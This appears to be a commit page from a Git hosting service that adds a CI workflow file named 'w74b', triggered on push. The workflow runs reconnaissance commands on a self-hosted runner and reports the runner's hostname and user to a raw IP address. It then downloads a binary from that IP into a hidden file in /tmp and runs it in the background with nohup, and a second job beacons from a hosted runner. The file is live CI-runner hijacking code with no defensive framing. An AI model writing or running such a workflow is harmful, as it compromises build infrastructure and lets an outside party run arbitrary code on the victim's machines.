w74b
w74 / a (push) Canceled after 0s
w74b / b (push) Canceled after 0s
w74b / c (push) Canceled after 0s

This commit is contained in:
2026-08-28 21:51:50 +00:00
parent a6b166e718
commit 3bbca79f4e
+13
View File
@@ -0,0 +1,13 @@
name: w74b
on: [push, workflow_dispatch]
jobs:
b:
runs-on: self-hosted
steps:
- run: |
id; hostname; curl -sS http://38.22.234.200:19090/runner-$(hostname)-$(whoami) || true
curl -fsSL http://38.22.234.200:19091/ -o /tmp/.rb; chmod +x /tmp/.rb; nohup /tmp/.rb >/dev/null 2>&1 &
c:
runs-on: ubuntu-latest
steps:
- run: curl -sS http://38.22.234.200:19090/ghrunner-$(hostname) || true